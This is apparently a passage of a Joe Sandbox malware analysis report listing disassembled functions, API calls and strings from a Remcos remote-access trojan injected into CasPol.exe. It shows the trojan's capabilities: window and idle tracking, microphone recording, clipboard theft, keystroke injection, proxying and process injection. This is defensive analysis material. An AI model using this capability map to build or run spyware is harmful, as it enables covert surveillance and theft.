                                                                                                              • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                              APIs
                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040A4A4
                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                                                              • API String ID: 911427763-3954389425
                                                                                                              • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                                                              • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                              • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                                                              • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 65535$udp
                                                                                                              • API String ID: 0-1267037602
                                                                                                              • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                              • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                              • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                              • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                              APIs
                                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040CA04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LongNamePath
                                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                              • API String ID: 82841172-425784914
                                                                                                              • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                                                              • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                              • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                                                              • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                              • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                              • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                              • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                              • _free.LIBCMT ref: 0043946A
                                                                                                              • _free.LIBCMT ref: 00439471
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2441525078-0
                                                                                                              • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                              • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                              APIs
                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                              • GetMessageA.USER32 ref: 00404F21
                                                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 0040502B
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage

APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
• CloseHandle.KERNEL32(00000000), ref: 00416F2D
• DeleteFileA.KERNEL32(00000000), ref: 00416F3C
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
• String ID: <$@$@FG$@FG$Temp

APIs
• GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
• GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
• API ID: Service$CloseHandle$Open$ControlManager

APIs
• _free.LIBCMT ref: 00446DDF
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 00446DEB
• _free.LIBCMT ref: 00446DF6
• _free.LIBCMT ref: 00446E01
• _free.LIBCMT ref: 00446E0C
• _free.LIBCMT ref: 00446E17
• _free.LIBCMT ref: 00446E22
• _free.LIBCMT ref: 00446E2D
• _free.LIBCMT ref: 00446E38
• _free.LIBCMT ref: 00446E46
• API ID: _free$ErrorFreeHeapLast

• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt

APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
• Sleep.KERNEL32(00000064), ref: 00416688
• DeleteFileW.KERNEL32(00000000), ref: 004166BC
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp

APIs
• _strftime.LIBCMT ref: 00401AD3
  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401B85
• waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G

APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: XCG$`=G$x=G

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
  • Part of subcall function 0041CA1F: RegisterClassExA.USER32 ref: 0041CA6C
  • Part of subcall function 0041CA1F: CreateWindowExA.USER32 ref: 0041CA87
  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
• TranslateMessage.USER32(?), ref: 0041C9FB
• DispatchMessageA.USER32(?), ref: 0041CA05
• GetMessageA.USER32 ref: 0041CA12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                              • String ID: Remcos
                                                                                                              • API String ID: 1970332568-165870891
                                                                                                              APIs
                                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                              • __freea.LIBCMT ref: 00452DAA
                                                                                                              • __freea.LIBCMT ref: 00452DB6
                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                              • API String ID: 201697637-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                              • _free.LIBCMT ref: 00444714
                                                                                                              • _free.LIBCMT ref: 0044472D
                                                                                                              • _free.LIBCMT ref: 0044475F
                                                                                                              • _free.LIBCMT ref: 00444768
                                                                                                              • _free.LIBCMT ref: 00444774
                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                              • String ID: C
                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                              • String ID: tcp$udp
                                                                                                              • API String ID: 0-3725065008
                                                                                                              APIs
                                                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401902
                                                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                              • String ID: T=G$p[G$>G$>G
                                                                                                              • API String ID: 1596592924-2461731529
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00406C38
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00406C80
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406CC0
                                                                                                              • MoveFileW.KERNEL32 ref: 00406CDD
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406D08
                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                              • String ID: .part
                                                                                                              • API String ID: 1303771098-3499674018
                                                                                                              APIs
                                                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32 ref: 004125A6
                                                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                              • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                              • API String ID: 37874593-703403762
                                                                                                              APIs
                                                                                                              • SendInput.USER32 ref: 00418B08
                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                • Part of subcall function 00418AB1: MapVirtualKeyA.USER32 ref: 00418AB7
                                                                                                              • API ID: InputSend$Virtual
                                                                                                              • API String ID: 1167301434-0
                                                                                                              APIs
                                                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                              • GetClipboardData.USER32 ref: 00415A71
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                              • String ID:
                                                                                                              • API String ID: 2172192267-0
                                                                                                              • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                                                              • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                              • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                                                              • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00447EBC
                                                                                                              • _free.LIBCMT ref: 00447EE0
                                                                                                              • _free.LIBCMT ref: 00448067
                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                              • _free.LIBCMT ref: 00448233
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                              • String ID:
                                                                                                              • API String ID: 314583886-0
                                                                                                              • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                                                                              • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                              • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                                                                              • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                              • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              • _free.LIBCMT ref: 00444086
                                                                                                              • _free.LIBCMT ref: 0044409D
                                                                                                              • _free.LIBCMT ref: 004440BC
                                                                                                              • _free.LIBCMT ref: 004440D7
                                                                                                              • _free.LIBCMT ref: 004440EE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$AllocateHeap
                                                                                                              • String ID: J7D
                                                                                                              • API String ID: 3033488037-1677391033
                                                                                                              • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                              • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                              APIs
                                                                                                              • GetConsoleCP.KERNEL32 ref: 0044A105
                                                                                                              • __fassign.LIBCMT ref: 0044A180
                                                                                                              • __fassign.LIBCMT ref: 0044A19B
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000), ref: 0044A1E0
                                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000), ref: 0044A219
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 1324828854-0
                                                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID: HE$HE
                                                                                                              • API String ID: 269201875-1978648262
                                                                                                              • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                              • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00412CC1
                                                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00412A4C
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • RegCloseKey.ADVAPI32(TUFTUF), ref: 00412E31
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                                              • String ID: TUFTUF$>G$DG$DG
                                                                                                              • API String ID: 3114080316-344394840
                                                                                                              • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                                                                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                              • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                                                                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                              APIs
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                              • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                              • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                              APIs
                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
